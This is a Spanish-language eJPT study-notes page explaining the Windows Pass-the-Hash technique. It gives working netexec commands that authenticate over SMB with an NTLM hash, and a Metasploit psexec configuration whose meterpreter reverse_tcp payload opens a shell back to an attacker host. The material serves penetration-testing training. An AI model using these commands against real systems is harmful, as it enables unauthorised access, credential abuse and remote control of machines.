> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/ataques-basados-en-sistema-host/windows/volcado-de-credenciales-de-windows/ataque-pass-the-hash.md).

# Ataque Pass-the-Hash

### 🧪 Pass-The-Hash (PtH)

* **Pass-the-Hash** es una técnica de explotación que consiste en capturar o recolectar **hashes NTLM** (o contraseñas en texto claro) y utilizarlos para **autenticarse legítimamente en un sistema objetivo**, sin necesidad de conocer la contraseña original.

***

### 🔧 Herramientas comunes para Pass-The-Hash

* 🔹 **Metasploit** – módulo `psexec`
* 🔹 **CrackMapExec** – herramienta muy útil para entornos de red de Windows

***

### 🎯 Objetivo

* Esta técnica permite **obtener acceso al sistema de forma legítima**, usando credenciales válidas (el hash), **sin necesidad de explotar vulnerabilidades de servicio**.
* Es comúnmente utilizada en entornos **Windows**, especialmente en redes con **Active Directory** mal configurado.

***

### 🧰 CrackMapExec / NetExec – Pass-The-Hash

📌 Supongamos que ya has obtenido un hash NTLM de un usuario con privilegios sobre la máquina víctima.

```bash
netexec smb 192.168.1.100 -u administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
```

📌 También puedes usar el parámetro `-d` si conoces el dominio:

```bash
netexec smb 192.168.1.100 -u administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d dominio.local
```

✅ Si las credenciales son válidas, verás una respuesta indicando acceso (`Pwn3d!` si CME detecta que puede ejecutar comandos como SYSTEM).

***

### ⚙️ Metasploit – Módulo `psexec`

```bash
use exploit/windows/smb/psexec
```

#### Parámetros clave:

```bash
set RHOSTS 192.168.1.100
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
set SMBDomain .
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.6
set LPORT 4444
exploit
```

📌 **Nota:** Para usar hashes en `SMBPass`, simplemente colócalo en formato `LM:NT` como en CME.
